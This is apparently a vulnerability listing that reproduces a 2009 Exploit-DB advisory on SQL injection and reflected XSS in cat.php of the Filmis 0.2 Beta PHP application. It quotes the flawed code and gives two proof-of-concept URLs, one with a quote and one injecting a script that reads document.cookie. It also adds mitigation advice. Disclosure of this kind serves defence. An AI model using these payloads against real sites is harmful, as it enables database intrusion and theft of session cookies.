Filmis - Version 0.2 Beta SQL Injection and XSS Vulnerabilities

vendor:

Filmis

by:

M.Jock3R

7.5

CVSS

HIGH

SQL Injection and XSS

CWE

Product Name: Filmis

Affected Version From: 0.2 Beta

Affected Version To: 0.2 Beta

Patch Exists: NO

Related CWE: N/A

CPE: a:mohshow:filmis:0.2beta

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP2 FR

2009

Filmis – Version 0.2 Beta SQL Injection and XSS Vulnerabilities

The Filmis - Version 0.2 Beta web application is vulnerable to both SQL Injection and XSS attacks. An attacker can exploit the vulnerability by sending a maliciously crafted HTTP request to the vulnerable web application. The vulnerable code is located in the cat.php file, where the $idcat variable is not properly sanitized before being used in an SQL query. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable web application, such as http://localhost/filmis/cat.php?nb=-1'. For XSS, an attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable web application, such as http://localhost/filmis/cat.php?nb=1><script>alert(document.cookie)</script>

Mitigation:

Input validation should be used to ensure that untrusted data is not used to generate SQL queries. Additionally, output encoding should be used to ensure that user-supplied data is not interpreted as HTML or JavaScript.

Source

Exploit-DB raw data:

===================================================================================

 Filmis - Version 0.2 Beta SQL Injection and XSS Vulnerabilities

===================================================================================

# Exploit Title: Filmis - Version 0.2 Beta SQL Injection and XSS Vulnerabilities

# Author: M.Jock3R 

# USE MY ONLINE SQLI SCAN TOOL[CODED By ME] : http://dzcode.tk/sql.php (To discover that such exploit) 

# Download Script(Official site): http://mohshow.fr.cr/forum/downloads/filmis-0.2beta.zip

# Category:: webapps

# Tested on: windows XP Sp2 FR

  

===================================================================================

 

Vuln file : cat.php

  

Vuln Code :

---------- 

$idcat = $_GET['id'];

$nbitemparpage= "28";

if(@$_GET['nb']=="") { $nb = "1"; } else { $nb = $_GET['nb']; }

$nbd = ceil(($nb -1) * $nbitemparpage);

$amem = mysql_query("SELECT * FROM ".$prefix."film");

         

Exploit:

---------

1/SQL INJECTION :

http://localhost/filmis/cat.php?nb=-1'



2/XSS :

http://localhost/filmis/cat.php?nb=1><script>alert(document.cookie)</script>

 

===================================================================================

Greets To :

adelsbm / attiadona  / Wprojects.tk



Email : madrido.jocker@gmail.com

  

THANKS TO ALL ALGERIANS HACK3RS

===================================================================================